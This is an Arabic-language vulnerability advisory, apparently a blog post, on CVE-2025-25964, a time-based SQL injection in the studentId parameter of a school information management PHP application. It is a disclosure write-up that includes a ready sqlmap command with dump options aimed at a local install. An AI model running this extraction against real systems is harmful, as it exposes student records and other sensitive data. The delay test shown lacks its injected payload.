
ثغرة حقن SQL حرجة (CVE-2025-25964) تم اكتشافها في School Information Management System v1.0
في المشهد الرقمي اليوم، يظل حقن SQL (SQLi) أحد أكثر الثغرات الأمنية شيوعًا وخطورة الموجودة في تطبيقات الويب. تناقش هذه التدوينة ثغرة حقن SQL حرجة (CVE-2025-25964) تم اكتشافها في نظام إدارة معلومات المدرسة الإصدار 1.0، المطوَّر من قبل Itsourcecode. تسمح هذه الثغرة للمهاجمين عن بُعد باستغلال النظام، مما قد يؤدي إلى كشف معلومات حساسة.
معرف CVE: CVE-2025-25964
نوع الثغرة: حقن SQL (SQLi)
المنتج المتأثر: نظام إدارة معلومات الطلاب - الإصدار 1.0
المكوّن المتأثر: معامل studentId في /columbans/admin/modules/student/index.php
نوع الهجوم: عن بُعد
الخطورة: عالية
المكتشف: Sakib Shaikh
لإثبات التأثير، اتبع هذه التعليمات خطوة بخطوة:
إعداد التطبيق الضعيف: قم بتثبيت وتهيئة نظام إدارة معلومات المدرسة الإصدار 1.0 على خادم محلي.
تسجيل الدخول: قم بتسجيل الدخول باستخدام بيانات الاعتماد المقدمة من Itsourecode.
الوصول إلى نقطة النهاية الضعيفة:
http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207
لاحظ استجابة التطبيق: إذا استغرق تحميل الصفحة 10 ثوانٍ أو أكثر، فهذا يؤكد وجود ثغرة حقن SQL. وهذا يثبت أن قاعدة البيانات الخلفية تنفذ استعلام SQL المحقون.
استخدم SQLMap للاستغلال الآلي:
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast
يحاول هذا الأمر استخراج أسماء قواعد البيانات والجداول والمعلومات الحساسة من النظام.
تنشأ المشكلة بسبب عدم تعقيم المدخلات بشكل صحيح في معامل studentId في ملف index.php. عندما يقوم المهاجم بتعديل معامل studentId بحمولات SQL خبيثة، تعالج التطبيق المدخلات دون تحقق مناسب، مما يؤدي إلى حقن SQL.